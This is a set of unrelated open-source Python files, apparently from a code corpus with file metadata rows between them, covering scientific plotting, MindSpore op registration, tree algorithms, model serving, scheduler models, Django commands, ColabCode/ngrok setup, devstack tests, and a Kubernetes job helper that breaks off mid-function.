S_matrix = MSI_st_instance_two.S_matrix
X = MSI_st_instance_two.X
Xdf = MSI_st_instance_two.X_data_frame
covarience = MSI_st_instance_two.covarience
exp_dict_list_optimized_extra_reaction = MSI_st_instance_two.experiment_dictonaries
parsed_yaml_list = MSI_st_instance_two.list_of_parsed_yamls
sigma = MSI_st_instance_two.sigma
X = MSI_st_instance_two.X
delta_X = MSI_st_instance_two.delta_X
molecular_parameter_updates = MSI_st_instance_two.delta_x_molecular_params_by_reaction_dict
nominal_dict_six_p_fit = MSI_st_instance_two.six_paramter_fit_nominal_parameters_dict
original_diag = np.diag(original_covariance)
#target_value_rate_constant_csv = 'MSI/data/test_data/FFCM1_custom_target_value_test.csv'
original_cti_file = MSI_st_instance_two.data_directory +'/'+ MSI_st_instance_two.cti_file_name
experiment_dict_uncertainty = MSI_st_instance_two.experiment_dict_uncertainty_original
target_value_csv = MSI_st_instance_two.data_directory +'/'+ MSI_st_instance_two.k_target_values_csv
six_parameter_fit_dict_optimized = MSI_st_instance_two.updated_six_parameter_fits_dict
if run_with_k_target_values == 'On' or run_with_k_target_values == 'on':
k_target_value_S_matrix = MSI_st_instance_two.k_target_values_for_s
else:
k_target_value_S_matrix = None
##########################################################################################################################
#PLOTTING##
##########################################################################################################################
#csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_FFCM1.csv'
csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_glarborg.csv'
#csv_file_sigma = ''
plotting_instance = plotter.Plotting(S_matrix,
s_matrix,
Y_matrix,
Y_matrix,
z_matrix,
X,
sigma,
covarience,
original_covariance,
S_matrix_original,
exp_dict_list_optimized_extra_reaction,
exp_dict_list_original,
parsed_yaml_list,
Ydf,
target_value_rate_constant_csv= MSI_st_instance_two.data_directory +'/'+ rate_constant_target_value_data_for_plotting ,
target_value_rate_constant_csv_extra_values = MSI_st_instance_two.data_directory +'/'+rate_constant_target_value_data_extra,
k_target_value_S_matrix =k_target_value_S_matrix,
k_target_values=run_with_k_target_values,
working_directory = working_directory,
sigma_uncertainty_weighted_sensitivity_csv=csv_file_sigma)
#csv_file_sigma = MSI_st_instance_two.data_directory +'/'+'sigma_for_uncertainty_weighted_sensitivity_updated.csv'
observable_counter_and_absorbance_wl,length_of_experimental_data = plotting_instance.lengths_of_experimental_data()
sigmas_optimized,test = plotting_instance.calculating_sigmas(S_matrix,covarience)
sigmas_original,test2 = plotting_instance.calculating_sigmas(S_matrix_original,original_covariance)
plotting_instance.plotting_observables(sigmas_original = sigmas_original,sigmas_optimized= sigmas_optimized)
diag = plotting_instance.getting_matrix_diag(covarience)
#plotting_instance.Y_matrix_plotter(Y_matrix,exp_dict_list_optimized,y,sigma)
#
#
#plotting_instance.plotting_rate_constants(optimized_cti_file=MSI_st_instance_two.new_cti_file,
# original_cti_file=original_cti_file,
# initial_temperature=250,
# final_temperature=2500)
sensitivity, top_sensitivity = plotting_instance.sort_top_uncertainty_weighted_sens()
obs = plotting_instance.plotting_uncertainty_weighted_sens()
plotting_instance.plotting_rate_constants_six_paramter_fit(optimized_cti_file=MSI_st_instance_two.new_cti_file,
original_cti_file=original_cti_file,
initial_temperature=250,
final_temperature=2500,
master_equation_reactions = master_equation_reactions,
six_parameter_fit_dict_optimized = six_parameter_fit_dict_optimized,
six_parameter_fit_dict_nominal = six_parameter_fit_nominal_parameters_dict,
six_parameter_fit_sensitivity_dict =six_parameter_fit_sensitivities )
#plotting_instance.plotting_X_itterations(list_of_X_values_to_plot = [0,1,2,3,4,5,50],list_of_X_array=X_list,number_of_iterations=numer_of_iterations)
post_processor_instance = post_processor.post_processing(optimized_cti_file = MSI_st_instance_two.new_cti_file,
original_cti_file = original_cti_file,
kinetic_paramter_dictonary = MSI_st_instance_two.kinetic_paramter_dict,
master_equation_reactions=master_equation_reactions,
six_parameter_fit_nominal_parameters_dict = six_parameter_fit_nominal_parameters_dict,
six_parameter_fit_optimized_paramter_dict = six_parameter_fit_dict_optimized,
exp_dict_list_optimized = exp_dict_list_optimized_extra_reaction,
exp_dict_list_original = exp_dict_list_original,
parsed_yaml_list = parsed_yaml_list)
kinetic_paramters_dict = post_processor_instance.create_active_kinetic_paramter_dictonary()
physical_params_dict = post_processor_instance.create_active_physical_paramter_dictonary()
| 77.023973 | 279 | 0.537504 | [
"MIT"
] | TheBurkeLab/MSI | tests/shock_tube_optimization_shell_six_paramter_fit_test_modified.py | 22,491 | Python |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""StackPush and StackPop op"""
from mindspore.ops.op_info_register import op_info_register, AiCPURegOp, DataType
stack_init_op_info = AiCPURegOp("StackInit") \
.fusion_type("OPAQUE") \
.attr("index", "int") \
.get_op_info()
stack_push_op_info = AiCPURegOp("StackPush") \
.fusion_type("OPAQUE") \
.input(0, "src", "required") \
.attr("index", "int") \
.dtype_format(DataType.U8_Default) \
.dtype_format(DataType.U16_Default) \
.dtype_format(DataType.U32_Default) \
.dtype_format(DataType.U64_Default) \
.dtype_format(DataType.I8_Default) \
.dtype_format(DataType.I16_Default) \
.dtype_format(DataType.I32_Default) \
.dtype_format(DataType.I64_Default) \
.dtype_format(DataType.F16_Default) \
.dtype_format(DataType.F32_Default) \
.dtype_format(DataType.F64_Default) \
.dtype_format(DataType.BOOL_Default) \
.get_op_info()
stack_pop_op_info = AiCPURegOp("StackPop") \
.fusion_type("OPAQUE") \
.output(0, "dst", "required") \
.attr("index", "int") \
.dtype_format(DataType.U8_Default) \
.dtype_format(DataType.U16_Default) \
.dtype_format(DataType.U32_Default) \
.dtype_format(DataType.U64_Default) \
.dtype_format(DataType.I8_Default) \
.dtype_format(DataType.I16_Default) \
.dtype_format(DataType.I32_Default) \
.dtype_format(DataType.I64_Default) \
.dtype_format(DataType.F16_Default) \
.dtype_format(DataType.F32_Default) \
.dtype_format(DataType.F64_Default) \
.dtype_format(DataType.BOOL_Default) \
.get_op_info()
stack_destroy_op_info = AiCPURegOp("StackDestroy") \
.fusion_type("OPAQUE") \
.attr("index", "int") \
.get_op_info()
@op_info_register(stack_init_op_info)
def _stack_init_aicpu():
"""StackInit aicpu register"""
return
@op_info_register(stack_push_op_info)
def _stack_push_aicpu():
"""StackPush aicpu register"""
return
@op_info_register(stack_pop_op_info)
def _stack_pop_aicpu():
"""StackPop aicpu register"""
return
@op_info_register(stack_destroy_op_info)
def _stack_destroy_aicpu():
"""StackDestroy aicpu register"""
return
| 31.920455 | 81 | 0.700961 | [
"Apache-2.0"
] | 233-puchi/mindspore | mindspore/ops/_op_impl/aicpu/stack_push_pop.py | 2,809 | Python |
from tree import TreeNode
def min_depth(root):
    """
    :type root: TreeNode
    :rtype: int
    """
    if root is None:
        return 0
    # A missing child cannot count as a leaf, so the path must go through the other child.
    if root.left is None or root.right is None:
        return max(min_depth(root.left), min_depth(root.right)) + 1
    return min(min_depth(root.left), min_depth(root.right)) + 1
# iterative
def min_height(root):
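    """Iterative BFS: return the depth of the shallowest leaf (0 for an empty tree)."""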
if root is None:
return 0
height = 0
level = [root]
while level:
height += 1
new_level = []
for node in level:
if node.left is None and node.right is None:
return height
if node.left is not None:
new_level.append(node.left)
if node.right is not None:
new_level.append(node.right)
level = new_level
return height
def print_tree(root):
if root is not None:
print(root.val)
print_tree(root.left)
print_tree(root.right)
if __name__ == '__main__':
tree = TreeNode(10)
tree.left = TreeNode(12)
tree.right = TreeNode(15)
tree.left.left = TreeNode(25)
tree.left.left.right = TreeNode(100)
tree.left.right = TreeNode(30)
tree.right.left = TreeNode(36)
height = min_height(tree)
print_tree(tree)
print("height:", height)
| 23.963636 | 73 | 0.593323 | [
"MIT"
] | AdrialYeoh/algorithms | algorithms/tree/min_height.py | 1,318 | Python |
import argparse
import ceserver
import tensorflow as tf
tf.keras.backend.clear_session()
from .model import AlibiDetectModel
DEFAULT_MODEL_NAME = "model"
parser = argparse.ArgumentParser(parents=[ceserver.server.parser])
parser.add_argument('--model_name', default=DEFAULT_MODEL_NAME,
help='The name that the model is served under.')
parser.add_argument('--storage_uri', required=True,
help='A URI pointer to the model')
args, _ = parser.parse_known_args()
if __name__ == "__main__":
model = AlibiDetectModel(args.model_name, args.storage_uri)
ceserver.CEServer().start(model)
| 28.681818 | 68 | 0.729002 | [
"Apache-2.0"
] | NunoEdgarGFlowHub/alibi-detect | integrations/adserver/adserver/__main__.py | 631 | Python |
__author__ = 'Bohdan Mushkevych'
from odm.fields import BooleanField, StringField, DictField, ListField, NestedDocumentField
from odm.document import BaseDocument
from synergy.db.model.job import Job
from synergy.db.model.managed_process_entry import ManagedProcessEntry
from synergy.db.model.freerun_process_entry import FreerunProcessEntry
from synergy.db.model.timetable_tree_entry import TimetableTreeEntry
class RestFreerunSchedulerEntry(FreerunProcessEntry):
is_alive = BooleanField()
next_run_in = StringField()
class RestManagedSchedulerEntry(ManagedProcessEntry):
is_alive = BooleanField()
next_run_in = StringField()
next_timeperiod = StringField()
reprocessing_queue = ListField()
class RestTimetableTree(TimetableTreeEntry):
dependant_trees = ListField()
sorted_process_names = ListField()
processes = DictField()
class RestJob(Job):
time_qualifier = StringField()
number_of_children = StringField()
class RestTimetableTreeNode(BaseDocument):
node = NestedDocumentField(RestJob, null=True)
children = DictField()
| 28.657895 | 91 | 0.795225 | [
"BSD-3-Clause"
] | mushkevych/scheduler | synergy/mx/rest_model.py | 1,089 | Python |
from winning.lattice_copula import gaussian_copula_margin_0
from winning.lattice import skew_normal_density
from winning.lattice_plot import densitiesPlot
from pprint import pprint
def test_ensure_scipy():
from winning.scipyinclusion import using_scipy
from scipy.integrate import quad_vec
assert using_scipy
def test_five_skew():
mus = [-0.5, -0.25, 0, 1, 1.5]
scales = [1.0, 1.5, 1.2, 1.3, 2.0]
densities = [skew_normal_density(L=500, unit=0.01, scale=scale, loc=mu, a=1.0) for mu, scale in zip(mus, scales)]
margin_0 = gaussian_copula_margin_0(densities, rho=0.9)
return densities[0], margin_0
if __name__=='__main__':
density1, density2 = test_five_skew()
legend = ['margin','reconstructed']
densitiesPlot(densities=[density1,density2], unit=0.1, legend=legend)
print(sum(density2))
| 29.103448 | 117 | 0.727488 | [
"MIT"
] | microprediction/winning | tests/test_lattice_five_margin.py | 844 | Python |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import os
from django.core.management.base import BaseCommand
from django.conf import settings
from lib.l10n_utils.gettext import merge_lang_files
class Command(BaseCommand):
help = 'Merges gettext strings into .lang files'
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('langs', nargs='*')
def handle(self, *args, **options):
langs = options['langs']
if not langs:
langs = os.listdir(os.path.join(settings.ROOT, 'locale'))
langs = filter(lambda x: x != 'templates', langs)
langs = filter(lambda x: x[0] != '.', langs)
merge_lang_files(langs)
| 30.964286 | 69 | 0.665513 | [
"MPL-2.0"
] | SekhmetDesign/bedrock | lib/l10n_utils/management/commands/l10n_merge.py | 867 | Python |
#-*- coding: utf-8 -*-
from DBP.models import Base, session
from DBP.models.user import User
from sqlalchemy.orm import class_mapper
from sqlalchemy.inspection import inspect
from sqlalchemy.sql import func
from sqlalchemy.dialects.mysql import INTEGER,VARCHAR, DATETIME
from datetime import datetime
import csv
import io
from openpyxl import Workbook
from openpyxl import load_workbook
def utf_8_encoder(unicode_csv_data):
for line in unicode_csv_data:
yield line.encode('utf-8')
class OriginalData (object):
def __init__(self, length, name, mappinginfo):
self.length = length
self.name = name
cols = inspect(self.__class__).columns
if len(mappinginfo) != len(cols) -3:
raise TypeError
for col in mappinginfo:
setattr(self,str( u"sch_"+col["label"]["name"]),int(col["col"]))
def dict(self):
data = {
"id" : self.id,
"length" : self.length,
"name" : self.name,
"mapinfo" : self.mapList()
}
return data
def getInfo(self):
data = self.dict()
data["parsednum"] = len(self.parseds)
data["tasknum"] = sum(map(lambda x: len(x.tasks),self.parseds))
return data
def mapList(self):
maplist = list()
for col in filter(lambda x: x.name[:3] == u"sch", inspect(self.__class__).columns ):
maplist.append(getattr(self,col.name))
return maplist
def getSchema(self):
return filter(lambda x: x.name[:3] == u"sch", inspect(self.__class__).columns )
def loadcsv(self,submitter,csvread,nth,duration_start,duration_end):
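		# Project each CSV row onto the mapped schema columns, tracking empty-cell counts
		# per column and duplicate rows, then record the upload as a ParsedData entry
		# assigned to a randomly chosen evaluator.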
reader = csv.reader(csvread, delimiter=',', quotechar="'")
csvwrite = io.BytesIO()
writer = csv.writer(csvwrite, delimiter=',', quotechar="'")
maplist = self.mapList()
counter = 0
dupset = set()
dupcounter = 0
nullcount = dict()
schema = self.getSchema()
for col in schema:
nullcount[col.name] = 0
for rrow in reader:
crow = list()
for mapnum, col in zip(maplist, schema):
crow.append(rrow[mapnum])
if rrow[mapnum] == "":
nullcount[col.name] +=1
dupset.add(unicode(crow))
writer.writerow(crow)
counter += 1
evaluator = User.randomEvaluator()
parsedmodel = self.parsedclass(nth,duration_start,duration_end,csvwrite,counter, counter - len(dupset))
parsedmodel.submitterid = submitter.id
parsedmodel.evaluatorid = evaluator.id
self.taskrow.addUser(evaluator)
for col in schema :
setattr(parsedmodel,"null_" + col.name[4:] , nullcount[col.name] / (counter*1.0) )
self.parseds.append(parsedmodel)
session.commit()
return parsedmodel
def loadxlsx(self,submitter,xlsxread,nth,duration_start,duration_end):
wb = load_workbook(xlsxread)
ws = wb.active
csvwrite = io.BytesIO()
writer = csv.writer(csvwrite, delimiter=',', quotechar="'")
maplist = self.mapList()
counter = 0
dupset = set()
dupcounter = 0
nullcount = dict()
schema = self.getSchema()
for col in schema:
nullcount[col.name] = 0
for rrow in ws.rows:
crow = list()
for mapnum, col in zip(maplist, schema):
if type(rrow[mapnum].value) == datetime:
crow.append(rrow[mapnum].value.strftime("%Y-%m-%d %H:%M"))
else :
crow.append(rrow[mapnum].value)
if rrow[mapnum].value == "":
nullcount[col.name] +=1
dupset.add(unicode(crow))
utfrow = list ()
for x in crow:
if type(x) == unicode :
utfrow.append(x.encode("utf8"))
else :
utfrow.append(x)
writer.writerow(utfrow)
counter += 1
evaluator = User.randomEvaluator()
parsedmodel = self.parsedclass(nth,duration_start,duration_end,csvwrite,counter, counter - len(dupset))
parsedmodel.submitterid = submitter.id
parsedmodel.evaluatorid = evaluator.id
self.taskrow.addUser(evaluator)
for col in schema :
setattr(parsedmodel,"null_" + col.name[4:] , nullcount[col.name] / (counter*1.0) )
self.parseds.append(parsedmodel)
session.commit()
return parsedmodel
def getInfoByUser(self,user):
data = self.dict()
data["nth"] = self.getNextnth (user)
return data
def getNextnth(self,user):
nth = session.query( func.max(self.parsedclass.nth)).filter(self.parsedclass.originalid == self.id).filter(self.parsedclass.submitterid == user.id).first()
if nth[0]:
return nth[0] +1
else :
return 1
class ParsedData (object):
def __init__(self,nth,duration_start,duration_end, csvfile, tuplenum,duplicatetuplenum):
self.nth = nth
self.duration_start = duration_start
self.duration_end = duration_end
self.file = csvfile.getvalue()
self.tuplenum = tuplenum
self.duplicatetuplenum = duplicatetuplenum
def parsecsv(self):
csvread = io.StringIO(self.file.decode("utf8"))
reader = csv.reader(utf_8_encoder(csvread), delimiter=',', quotechar="'")
parsedlist = list()
for row in reader:
tsmodel = self.taskclass(User.getUser(self.submitterid).name, self.id)
for (column, data) in zip(filter(lambda x: x.name[:3] == u"sch", inspect(self.taskclass).columns ), row):
if type(column.type) == INTEGER:
try :
setattr(tsmodel,column.name, int(data))
except :
setattr(tsmodel,column.name, None)
elif type(column.type) == DATETIME:
try :
setattr(tsmodel,column.name, datetime.strptime( data, "%Y-%m-%d %H:%M"))
except :
setattr(tsmodel,column.name, None)
else :
setattr(tsmodel,column.name, data)
parsedlist.append(tsmodel)
return parsedlist
def insertcsv(self):
if self.pnp != "Pass":
return False
session.bulk_save_objects(self.parsecsv())
session.commit()
return True
def dict(self):
return {
"id" : self.id,
"nth" : self.nth,
"tuplenum" : self.tuplenum,
"duplicatetuplenum" : self.duplicatetuplenum,
"duration_start" : self.duration_start.isoformat(),
"duration_end" : self.duration_end.isoformat(),
"status" : self.status,
"score" : self.score,
"pnp" : self.pnp,
"submitter" : User.getUser(self.submitterid).name,
"original" : self.original.name,
"evaluator": User.getUser(self.evaluatorid).name,
"nullratio" : self.nullInfo()
}
def evaluate(self, score,pnp):
self.status = "Evaluated"
self.score = 5 * score + 25 *( 1.0 - self.duplicatetuplenum/(self.tuplenum * 1.0) ) + 25 * (1.0 - sum(map(lambda x : x['ratio'] ,self.nullInfo()))/(len(self.nullInfo())*1.0))
self.pnp = pnp
session.commit()
def nullInfo(self):
nulllist = list()
for col in filter(lambda x: x.name[:4] == u"null", inspect(self.__class__).columns ):
nulllist.append(dict(ratio=getattr(self,col.name) ,name = col.name[5:] ))
return nulllist
class TaskData (object):
def __init__ (self,submittername, parsedid):
self.submittername = submittername
self.parsedid = parsedid
| 24.083333 | 176 | 0.68136 | [
"MIT"
] | Pusnow/DB-Project | DBP/models/instance.py | 6,647 | Python |
import os
import subprocess
import uuid
import nest_asyncio
import uvicorn
from pyngrok import ngrok
try:
from google.colab import drive
colab_env = True
except ImportError:
colab_env = False
EXTENSIONS = ["ms-python.python", "ms-toolsai.jupyter", "mechatroner.rainbow-csv", "vscode-icons-team.vscode-icons", "dongli.python-preview", "njpwerner.autodocstring"]
CODESERVER_VERSION = "3.10.2"
class ColabCode:
def __init__(
self,
port=10000,
password=None,
authtoken=None,
mount_drive=False,
code=True,
lab=False,
):
self.port = port
self.password = password
self.authtoken = authtoken
self._mount = mount_drive
self._code = code
self._lab = lab
if self._lab:
self._start_server()
self._run_lab()
if self._code:
self._install_code()
self._install_extensions()
self._start_server()
self._run_code()
@staticmethod
def _install_code():
subprocess.run(["wget", "https://code-server.dev/install.sh"], stdout=subprocess.PIPE)
subprocess.run(
["sh", "install.sh", "--version", f"{CODESERVER_VERSION}"],
stdout=subprocess.PIPE,
)
@staticmethod
def _install_extensions():
for ext in EXTENSIONS:
subprocess.run(["code-server", "--install-extension", f"{ext}"])
def _start_server(self):
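        # Close any existing ngrok tunnels, then expose the chosen local port over an HTTPS tunnel.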
if self.authtoken:
ngrok.set_auth_token(self.authtoken)
active_tunnels = ngrok.get_tunnels()
for tunnel in active_tunnels:
public_url = tunnel.public_url
ngrok.disconnect(public_url)
url = ngrok.connect(addr=self.port, bind_tls=True)
if self._code:
print(f"Code Server can be accessed on: {url}")
else:
print(f"Public URL: {url}")
def _run_lab(self):
token = str(uuid.uuid1())
print(f"Jupyter lab token: {token}")
base_cmd = "jupyter-lab --ip='localhost' --allow-root --ServerApp.allow_remote_access=True --no-browser"
os.system(f"fuser -n tcp -k {self.port}")
if self._mount and colab_env:
drive.mount("/content/drive")
if self.password:
lab_cmd = f" --ServerApp.token='{token}' --ServerApp.password='{self.password}' --port {self.port}"
else:
lab_cmd = f" --ServerApp.token='{token}' --ServerApp.password='' --port {self.port}"
lab_cmd = base_cmd + lab_cmd
with subprocess.Popen(
[lab_cmd],
shell=True,
stdout=subprocess.PIPE,
bufsize=1,
universal_newlines=True,
) as proc:
for line in proc.stdout:
print(line, end="")
def _run_code(self):
os.system(f"fuser -n tcp -k {self.port}")
if self._mount and colab_env:
drive.mount("/content/drive")
if self.password:
code_cmd = f"PASSWORD={self.password} code-server --port {self.port} --disable-telemetry"
else:
code_cmd = f"code-server --port {self.port} --auth none --disable-telemetry"
with subprocess.Popen(
[code_cmd],
shell=True,
stdout=subprocess.PIPE,
bufsize=1,
universal_newlines=True,
) as proc:
for line in proc.stdout:
print(line, end="")
def run_app(self, app, workers=1):
self._start_server()
nest_asyncio.apply()
uvicorn.run(app, host="127.0.0.1", port=self.port, workers=workers)
| 31.205128 | 168 | 0.579567 | [
"MIT"
] | pandya6988/colabcode | colabcode/code.py | 3,651 | Python |
# Copyright (C) 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import unittest
from devstack_local_conf import LocalConf
from collections import OrderedDict
class TestDevstackLocalConf(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_plugins(self):
"Test that plugins without dependencies work"
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
('baz', 'git://git.openstack.org/openstack/baz-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'))
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
plugins = []
with open(p['path']) as f:
for line in f:
if line.startswith('enable_plugin'):
plugins.append(line.split()[1])
self.assertEqual(['bar', 'baz', 'foo'], plugins)
def test_plugin_deps(self):
"Test that plugins with dependencies work"
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', '.git'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', '.git'))
with open(os.path.join(
self.tmpdir,
'foo-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin foo\n')
with open(os.path.join(
self.tmpdir,
'bar-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin bar\n')
f.write('plugin_requires bar foo\n')
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir=self.tmpdir,
path=os.path.join(self.tmpdir, 'test.local.conf'))
def test_libs_from_git(self):
"Test that LIBS_FROM_GIT is auto-generated"
projects = {
'git.openstack.org/openstack/nova': {
'required': True,
'short_name': 'nova',
},
'git.openstack.org/openstack/oslo.messaging': {
'required': True,
'short_name': 'oslo.messaging',
},
'git.openstack.org/openstack/devstack-plugin': {
'required': False,
'short_name': 'devstack-plugin',
},
}
project = {
'short_name': 'glance',
}
p = dict(base_services=[],
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'),
projects=projects,
project=project)
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
lfg = None
with open(p['path']) as f:
for line in f:
if line.startswith('LIBS_FROM_GIT'):
lfg = line.strip().split('=')[1]
self.assertEqual('nova,oslo.messaging,glance', lfg)
def test_overridelibs_from_git(self):
"Test that LIBS_FROM_GIT can be overridden"
localrc = {'LIBS_FROM_GIT': 'oslo.db'}
projects = {
'git.openstack.org/openstack/nova': {
'required': True,
'short_name': 'nova',
},
'git.openstack.org/openstack/oslo.messaging': {
'required': True,
'short_name': 'oslo.messaging',
},
'git.openstack.org/openstack/devstack-plugin': {
'required': False,
'short_name': 'devstack-plugin',
},
}
p = dict(localrc=localrc,
base_services=[],
base_dir='./test',
path=os.path.join(self.tmpdir, 'test.local.conf'),
projects=projects)
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'),
p.get('projects'),
p.get('project'))
lc.write(p['path'])
lfg = None
with open(p['path']) as f:
for line in f:
if line.startswith('LIBS_FROM_GIT'):
lfg = line.strip().split('=')[1]
self.assertEqual('oslo.db', lfg)
def test_plugin_circular_deps(self):
"Test that plugins with circular dependencies fail"
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'foo-plugin', '.git'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', 'devstack'))
os.makedirs(os.path.join(self.tmpdir, 'bar-plugin', '.git'))
with open(os.path.join(
self.tmpdir,
'foo-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin foo\n')
f.write('plugin_requires foo bar\n')
with open(os.path.join(
self.tmpdir,
'bar-plugin', 'devstack', 'settings'), 'w') as f:
f.write('define_plugin bar\n')
f.write('plugin_requires bar foo\n')
localrc = {'test_localrc': '1'}
local_conf = {'install':
{'nova.conf':
{'main':
{'test_conf': '2'}}}}
services = {'cinder': True}
# We use ordereddict here to make sure the plugins are in the
# *wrong* order for testing.
plugins = OrderedDict([
('bar', 'git://git.openstack.org/openstack/bar-plugin'),
('foo', 'git://git.openstack.org/openstack/foo-plugin'),
])
p = dict(localrc=localrc,
local_conf=local_conf,
base_services=[],
services=services,
plugins=plugins,
base_dir=self.tmpdir,
path=os.path.join(self.tmpdir, 'test.local.conf'))
with self.assertRaises(Exception):
lc = LocalConf(p.get('localrc'),
p.get('local_conf'),
p.get('base_services'),
p.get('services'),
p.get('plugins'),
p.get('base_dir'))
lc.write(p['path'])
if __name__ == '__main__':
unittest.main()
| 37.889831 | 72 | 0.497652 | [
"Apache-2.0"
] | HoonMinJeongUm/HoonMin-devstack | roles/write-devstack-local-conf/library/test.py | 8,942 | Python |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from kubernetes import client as k8s_client
from kubernetes import config
import time
import logging
import re
from .. import dsl
class K8sHelper(object):
""" Kubernetes Helper """
def __init__(self):
if not self._configure_k8s():
raise Exception('K8sHelper __init__ failure')
def _configure_k8s(self):
try:
config.load_kube_config()
logging.info('Found local kubernetes config. Initialized with kube_config.')
except:
logging.info('Cannot Find local kubernetes config. Trying in-cluster config.')
config.load_incluster_config()
logging.info('Initialized with in-cluster config.')
self._api_client = k8s_client.ApiClient()
self._corev1 = k8s_client.CoreV1Api(self._api_client)
return True
def _create_k8s_job(self, yaml_spec):
""" _create_k8s_job creates a kubernetes job based on the yaml spec """
pod = k8s_client.V1Pod(metadata=k8s_client.V1ObjectMeta(generate_name=yaml_spec['metadata']['generateName']))
container = k8s_client.V1Container(name = yaml_spec['spec']['containers'][0]['name'],
image = yaml_spec['spec']['containers'][0]['image'],
args = yaml_spec['spec']['containers'][0]['args'],
volume_mounts = [k8s_client.V1VolumeMount(
name=yaml_spec['spec']['containers'][0]['volumeMounts'][0]['name'],
mount_path=yaml_spec['spec']['containers'][0]['volumeMounts'][0]['mountPath'],
)],
env = [k8s_client.V1EnvVar(
name=yaml_spec['spec']['containers'][0]['env'][0]['name'],
value=yaml_spec['spec']['containers'][0]['env'][0]['value'],
)])
pod.spec = k8s_client.V1PodSpec(restart_policy=yaml_spec['spec']['restartPolicy'],
containers = [container],
service_account_name=yaml_spec['spec']['serviceAccountName'],
volumes=[k8s_client.V1Volume(
name=yaml_spec['spec']['volumes'][0]['name'],
secret=k8s_client.V1SecretVolumeSource(
secret_name=yaml_spec['spec']['volumes'][0]['secret']['secretName'],
)
)])
try:
api_response = self._corev1.create_namespaced_pod(yaml_spec['metadata']['namespace'], pod)
return api_response.metadata.name, True
except k8s_client.rest.ApiException as e:
logging.exception("Exception when calling CoreV1Api->create_namespaced_pod: {}\n".format(str(e)))
return '', False
def _wait_for_k8s_job(self, pod_name, yaml_spec, timeout):
""" _wait_for_k8s_job waits for the job to complete """
status = 'running'
start_time = datetime.now()
while status in ['pending', 'running']:
# Pod pending values: https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1PodStatus.md
try:
api_response = self._corev1.read_namespaced_pod(pod_name, yaml_spec['metadata']['namespace'])
status = api_response.status.phase.lower()
time.sleep(5)
elapsed_time = (datetime.now() - start_time).seconds
logging.info('{} seconds: waiting for job to complete'.format(elapsed_time))
if elapsed_time > timeout:
logging.info('Kubernetes job timeout')
return False
except k8s_client.rest.ApiException as e:
logging.exception('Exception when calling CoreV1Api->read_namespaced_pod: {}\n'.format(str(e)))
return False
return status == 'succeeded'
def _delete_k8s_job(self, pod_name, yaml_spec):
""" _delete_k8s_job deletes a pod """
try:
api_response = self._corev1.delete_namespaced_pod(pod_name, yaml_spec['metadata']['namespace'], body=k8s_client.V1DeleteOptions())
except k8s_client.rest.ApiException as e:
